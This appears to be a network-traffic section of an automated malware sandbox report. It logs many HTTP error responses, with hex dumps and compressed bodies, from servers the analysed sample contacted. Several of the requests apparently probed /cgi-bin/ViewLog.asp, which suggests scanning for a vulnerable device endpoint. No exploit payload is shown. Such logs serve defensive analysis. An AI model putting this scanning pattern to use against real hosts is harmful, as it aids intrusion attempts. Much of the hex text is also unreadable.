3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 18 Mar 2024 08:58:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzzJaC0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 08:58:11 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:58:12 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 292Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 31 38 20 4d 61 72 20 32 30 32 34 20 30 38 3a 35 38 3a 31 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 73 6f 72 69 6e 63 69 6f 62 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Mon, 18 Mar 2024 08:58:12 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 307Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 08:58:12 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 11:58:11 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:57:11 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 31 38 20 4d 61 72 20 32 30 32 34 20 30 38 3a 35 37 3a 31 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 36 20 28 43 65 6e 74 4f 53 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>HTTP/1.1 400 Bad RequestDate: Mon, 18 Mar 2024 08:57:11 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 11:58:11 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 18 Mar 2024 08:58:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 19 9a e8 19 28 68 84 26 95 e6 95 94 6a 22 ab d5 07 d9 06 32 5d 1f ea 52 00 98 e9 56 70 b2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 8d(HML),I310Q/Qp/K&T$'gd*HN+I-0D7(bTgU(h&j"2]RVp0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 18 Mar 2024 08:58:13 GMTserver: Apachevary: accept-language,accept-charsetupgrade: h2connection: Upgradeaccept-ranges: bytestransfer-encoding: chunkedcontent-type: text/html; charset=utf-8content-language: enData Raw: 33 43 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 6e 75 6c 6c 40 69 6e 66 6f 6d 61 6e 69 61 6b 2e 63 68 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0a 0a 3c 2f 70 3e 0a 3c 70 3e 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 6e 75 6c 6c 40 69 6e 66 6f 6d 61 6e 69 61 6b 2e 63 68 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0a 3c 2f 70 3e 0a 0a 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 32 3e 0a 3c 61 64 64 72 65 73 73 3e 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 31 32 37 2e 30 2e 30 2e 31 3c
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 50Content-Type: text/htmlData Raw: 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 4e 6f 20 63 6f 6e 74 65 78 74 20 66 6f 75 6e 64 20 66 6f 72 20 72 65 71 75 65 73 74 Data Ascii: <h1>404 Not Found</h1>No context found for request
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:58:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingETag: W/"65bb8751-156"Content-Encoding: gzipData Raw: 66 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 90 bd 4e c4 30 10 84 7b 9e c2 58 a2 74 9c 13 5d 7e ae 01 6a 28 68 a8 90 63 6f ce 96 6c af 65 6f c8 85 a7 07 27 5c 45 b5 df ac 76 67 a4 19 ee 9f 5f 9f de 3f de 5e 98 a5 e0 cf 77 c3 31 18 1b dc 9c 55 00 56 b2 1e b9 25 4a a5 93 52 7b 5c cc aa b6 22 0a 29 72 5a 68 8c 04 91 9a f2 d8 2c 45 80 2a 24 4e 8d 0a ea 1b a3 5a 4b a3 31 48 c8 19 f3 67 52 17 90 41 b9 7a ae a2 06 61 b0 2a 11 54 4a 2e 5e 9a 1a cb d9 1e 39 61 36 90 47 de 72 56 68 f3 30 72 fc 82 3c 7b 5c 3b eb 8c 81 d8 df b4 b8 fe db 6c b7 8d 05 77 b1 d4 9d da f6 a1 5f 9d 21 7b 60 c2 e2 c8 61 ec d4 54 d0 2f 04 3d 61 ea da 74 ed 3d cc b4 43 de 1f 2b 4d 48 84 a1 22 67 87 df c8 ab 0b 67 bb e3 9f 38 0f f2 e8 ea b7 3d b9 d7 c7 7e 00 d9 11 de 34 56 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f7eN0{Xt]~j(hcoleo'\Evg_?^w1UV%JR{\")rZh,E$NZK1HgRAzaTJ.^9a6GrVh0r<{\;lw_!{`aT/=at=C+MH"gg8=~4V0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cacheConnection: closeContent-Type: text/htmlContent-Length: 55Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:58:18 GMTServer: Apache/2.4.38 (Debian)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:58:19 GMTServer: Apache/2.4.38 (Debian)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:58:19 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 18 Mar 2024 08:58:18 GMTserver: LiteSpeedData Raw: 31 33 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a d9 72 ab ca 7a be df 4f 41 9c 4a 72 4e b1 6c 66 09 7c ec 95 00 42 80 24 10 20 21 09 a5 52 bb 18 9a 41 8c 62 96 52 79 a0 bc 46 9e 2c 85 6c 2f cb 5a f6 5e 3b a9 5c a4 6f 10 fd 77 7f ff fc 77 ab 9b df 7e fb ed e9 ef 26 4b 7e 6d 69 02 14 d6 69 f2 fd b7 a7 97 07 04 41 d0 53 08 6c ef fb 6f 97 9f 29 a8 6d 28 ac eb e2 1e 1c 9b a8 7d be e3 f3 ac 06 59 7d 5f 9f 0a 70 07 b9 2f 6f cf 77 35 e8 6b 64 80 f8 1b e4 86 76 59 81 fa b9 a9 fd 7b fa ee 4b 1c db 0d c1 fd 30 bf cc 93 2b a0 2c bf 77 07 d2 97 13 b5 d2 0e 52 fb 7f 32 43 e8 8b a8 04 d5 d5 14 f4 03 7a 66 a7 e0 f9 ae 8d 40 57 e4 65 7d 35 ac 8b bc 3a 7c f6 40 1b b9 e0 fe f2 f2 0d 8a b2 a8 8e ec e4 be 72 ed 04 3c 63 0f 3f a0 ea a8 4e c0 77 12 25 21 35 af a1 69 de 64 de 13 f2 d2 f9 62 ca aa 3e 25 00 1a ec f6 6a 2e b7 aa 5e e5 18 4c ed e4 de 09 fa f7 cb d0 e1 75 68 7e 9e d5 f7 be 9d 46 c9 e9 11 62 cb c8 4e be 41 12 48 5a 50 47 ae fd 0d aa ec ac ba af 40 19 f9 7f fb 79 5a 15 9d c1 23 84 91 45 ff 91 98 44 19 b8 0f 41 14 84 f5 23 84 3d 90 38 4d 8d 31 12 67 3e 8e 72 6c 37 0e ca 41 87 7b 37 4f f2 f2 11 fa 7b ff d2 3e 0e 7b a3 e1 53 02 27 d0 8f b4 c2 f6 bc 28 0b 1e a1 9b fe d4 2e 83 28 fb d0 fd 1f 3f c4 af 80 5b 47 79 f6 0d f2 f3 bc 06 e5 8d 3d bc a8 2a 12 fb f4 08 39 49 ee c6 ff 07 ec 1e 86 f8 b3 a3 ec 27 4e 2f 42 de 27 c0 af 1f 21 bb a9 f3 8f cc 5e c9 e5 8b 15 7f a6 bf eb 0e 61 e8 b5 07 de 35 7d 28 41 55 e4 59 05 ee a3 cc cf 6f 14 7d b3 2b 7f 69 ef bc af a6 57 b5 5d 37 d5 bd 9b 7b e0 66 f2 25 6a 5e dc 4f a1 e8 3f fc d1 ec 12 d8 55 9e 7d 3d 1f a7 ae e7 0f 21 f9 95 0b ae 24 bb d8 d4 ad 2f 7a 7d fb e1 d9 87 17 5e f7 43 a1 b8 61 f8 a6 2d 7a 69 9f ca 3b c4 d2 10 18 76 f2 99 b9 ae a2 b5 04 05 b0 eb 47 28 cb ef 5f 7e be c3 0d e2 5f 8d 7c e3 8a 33 04 4b b2 1f 87 bd d1 a6 97 f6 4e bb d2 f2 56 22 fb 0b a5 fe 3c c4 7d 54 83 b4 ba 81 f9 11 49 38 5a f4 3f a5 52 94 bd a7 32 43 7c 11 68 d7 fe b8 41 7f 8d 63 27 af eb 3c 7d 84 06 1e ef ca fe a8 40 af a5 64 74 4d bc b2 c4 07 fc 5b 33 0c ee be f7 80 9b 97 